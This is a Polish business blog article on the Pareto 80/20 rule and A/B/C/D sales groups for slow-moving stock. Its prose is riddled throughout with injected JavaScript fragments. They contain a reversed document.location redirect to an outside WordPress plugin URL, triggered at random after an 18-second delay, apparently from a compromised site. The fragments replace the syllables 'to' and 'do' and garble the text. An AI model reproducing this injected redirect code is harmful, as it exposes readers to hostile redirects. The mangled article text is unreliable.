In Artykuły, Handel, Uniwersalne

W sprzedaży rządzi Reguła Pare toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to, zwana też Regułą 80/20, gdzie 20% produktów jest odpowiedzialna za 80% sprzedaży. Oczywiście trzeba zrobić dwa zastrzeżenia. Co toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}do zasady, ta reguła wcale nie rządzi. Ona tylko ilustruje mechanizmy, jakie mają miejsce w sprzedaży. A po drugie, jest jej niezbędna statystyka.

Grupy Sprzedażowe

Tak zwykle wygląda sprzedaż. Formuje się czołówka, gdzie A + B toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to 20% najlepiej sprzedających się produktów (A toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to najlepsze 5%). Dalej C, gdzie 80% aktywnych SKU odpowiada za 20% sprzedaży. Jest jeszcze Grupa D, która się wprawdzie nie sprzedaje zupełnie, ale jest i się kurzy.

D ma wady, ale i ma zalety

Większość firm jest światoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doma takiego podziału i w efekcie stara się wyeliminować Grupę D. Nikt jej nie lubi, leży i nie ma z niej sprzedaży.

A gdyby D nie było?

W eliminowaniu Grupy D mało firm odnosi prawdziwy sukces. Dlatego też może nie zastanawia się, co by było, gdyby się jednak udało. Otóż nic. A nawet wiele złego. Jeśli Grupa D powstaje światoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domie (a może bardziej ze światoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domością, bo światoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to chyba nikt jej nie tworzy), toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to ma jedna niewątpliwą zaletę. Ma mało zapasu. A toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to idealne rozwiązanie, gdyż jest, a jakoby jej nie było. Jeśli jednak uda się ją wyeliminować, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zastąpi ją część Grupy C. Już ze stanami właściwymi dla C, czyli znacznie wyższymi niż te z D. Dalej nie będzie się sprzedawało, a będzie drożej.

Powody powstawania D

Są jak najbardziej racjonalne i związane z procesem sprzedaży i charakterem klienta. Można się jednak obejść bez tej wiedzy, wystarczy tylko zas toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tosować w praktyce jej konsekwencje. Czyli zmniejszyć stany na D, najlepiej gdy jest jeszcze C.

Uwaga. „skąd bierze się D?” Z zachowania klienta. Tu związek jest jak najbardziej przyczynowo – skutkowy, ale na szczęście w kategoryzacji na Grupy Sprzedażowe (A/B/C/D) nie trzeba tego uwzględniać. Dlaczego na szczęście? Gdyż tu każdy może mieć inne zdanie i raczej każdą tezę da się obronić. Jeśli k toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toś chce się zagłębiać w przyczyny, toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to można np. powiedzieć, że cześć rzeczy jest lepszych, czyli reszta musi być gorsza. A wtedy ta gorsza, choć toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dobra, ale jednak gorsza, zostanie. Część toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}towaru stanie się przestarzała, bo zmieni się w międzyczasie moda. A część będzie trywialnie uszkodzona. To wszystko prawda. Ale można się obejść bez tej prawdy, po prostu zaakcep toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tować, że D jest. I uczynić z tego faktu sukces, przez nie wyprzedawanie jej na siłę, z dużym kosztem. Ale pozostawienie w małej ilości.

D, tak samo zresztą jak każda Grupa Sprzedażowa jest pojęciem dynamicznym. Dlatego cały czas produkty migrują między Grupami, najczęściej jednak tylko w jedną stronę, w dół (choć zdarza się proces odwrotny). I dlatego w D ciągle trzeba robić miejsce dla nowych, przez powolny proces wyprzedaży. To jednak oznacza, że D musi się stać co najmniej C, inaczej będzie na zawsze? Tak, wystarczy odkryć powody.

Typowy proces migracji między Grupami.

Bycie D ma zawsze swoją przyczynę

I war toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to ją odkryć, gdyż wtedy proces robienia miejsca na nowe D będzie prawie bezbolesny.

Proces pozbywania się D.

Jakie mogą być przyczyny bycia D? Różne. Niektóre tkwią w produkcie, niektóre w sprzedawcy, inne w o toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}toczeniu konkurencyjnym. Jednak zawsze jest jakiś powód i jego zrozumienie znacznie ułatwi pozbycie się kłopotu. A na pewno znacznie obniży jego koszt.

Powód Rozwiązanie
Za wysoka cena Obniżyć. Utrzymanie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dotychczasowej wcale nie ocali marży
Zły stan techniczny Przecenić. Albo naprawić
Zmiana mody Wyprzedać ze stratą. Na wystawie tylko będzie drażnić
Przestarzały To działa tak samo jak moda

Podsumowanie

Sprzedaż nie jest jednolita. Niektóre produkty sprzedają się lepiej, niektóre gorzej. Tak już jest i lepiej toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}to zaakcep toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tować. I zamienić z problemu w szanse. Ci, którzy się z tym pogodzą, zyskają na marży (zmniejszą koszty wyprzedaży) i na zapasie (nieunikniona Grupa D będzie tylko obecna, ale nie będzie toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dominować).

Podnieś efektywność biznesu już dziś!

Aby wdrożyć FRAME w Twojej firmie, wystarczy się z nami skontaktować.